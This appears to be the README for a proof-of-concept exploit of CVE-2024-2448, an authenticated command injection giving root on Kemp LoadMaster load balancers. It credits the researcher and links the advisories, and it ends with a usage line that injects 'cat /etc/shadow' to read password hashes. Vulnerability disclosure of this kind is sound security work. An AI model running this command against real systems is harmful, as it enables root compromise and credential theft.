Description: This allows authenticated command execution as root on LoadMaster load balancers.
Versions Affected: LoadMaster 7.2.59.2
Version Fixed: See Vendor Advisory
Researcher: Dav Yesland (https://twitter.com/daveysec)
Disclosure Link: https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-2448
Vendor Advisory: https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449
This exploits an authenticated (with any permission settings) command injection in LoadMaster where user input is executed by an eval statement.
python3 CVE-2024-2448.py --url 'https://LM_HOST:8443' --cookie 'AUTH_COOKIE' --cmd 'cat /etc/shadow'
